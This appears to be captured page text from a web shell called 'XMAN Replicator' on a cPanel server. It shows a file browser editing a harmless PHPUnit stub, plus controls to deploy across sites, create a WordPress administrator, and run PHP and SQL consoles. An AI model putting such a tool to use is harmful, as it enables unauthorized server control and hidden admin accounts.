🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
stubs-rector
/
PHPUnit
/
Framework
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
TestCase.php
575 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
Edit: TestCase.php
<?php declare(strict_types=1); namespace PHPUnit\Framework; use PHPUnit\Event\NoPreviousThrowableException; use PHPUnit\Framework\MockObject\MockObject; if (! class_exists('PHPUnit\Framework\TestCase')) { abstract class TestCase { /** * @psalm-template RealInstanceType of object * * @psalm-param class-string<RealInstanceType> $originalClassName * * @psalm-return MockObject&RealInstanceType */ protected function createMock(string $originalClassName): MockObject { } } }
Save
PHP Console
Execute
SQL Console
Execute